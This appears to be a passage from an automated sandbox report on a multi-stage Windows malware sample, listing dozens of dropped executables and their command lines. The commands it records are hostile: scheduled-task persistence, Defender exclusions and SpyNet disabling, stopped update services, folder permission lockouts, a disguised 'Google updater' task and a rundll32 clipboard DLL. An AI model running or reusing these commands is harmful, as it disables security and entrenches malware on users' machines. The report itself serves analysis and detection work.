| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe
"C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1092 -ip 1092
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 204
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6pK8ww3.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\26CD.tmp\26CE.tmp\26CF.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Zm5kJ78.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13066858964225448386,12215929807450836498,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13066858964225448386,12215929807450836498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,14973337550866805478,9103256636975688907,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,14973337550866805478,9103256636975688907,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\5464.exe
C:\Users\Admin\AppData\Local\Temp\5464.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe
C:\Users\Admin\AppData\Local\Temp\58CA.exe
C:\Users\Admin\AppData\Local\Temp\58CA.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7B48.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffc0b8e46f8,0x7ffc0b8e4708,0x7ffc0b8e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7CCF.exe
C:\Users\Admin\AppData\Local\Temp\7CCF.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\8A3E.exe
C:\Users\Admin\AppData\Local\Temp\8A3E.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 5376 -ip 5376
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Go001xH.exe
C:\Users\Admin\AppData\Local\Temp\924D.exe
C:\Users\Admin\AppData\Local\Temp\924D.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 540
C:\Users\Admin\AppData\Local\Temp\9675.exe
C:\Users\Admin\AppData\Local\Temp\9675.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,11479124697320355733,4943036712694769783,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7184 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\EF25.exe
C:\Users\Admin\AppData\Local\Temp\EF25.exe
C:\Users\Admin\AppData\Local\Temp\F0BC.exe
C:\Users\Admin\AppData\Local\Temp\F0BC.exe
C:\Users\Admin\AppData\Local\Temp\F282.exe
C:\Users\Admin\AppData\Local\Temp\F282.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\FAEF.exe
C:\Users\Admin\AppData\Local\Temp\FAEF.exe
C:\Users\Admin\AppData\Local\Temp\7zSFBEF.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp" /SL5="$60256,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5744 -ip 5744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 572
C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe
.\Install.exe /MKdidA "385119" /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\3FD9.exe
C:\Users\Admin\AppData\Local\Temp\3FD9.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
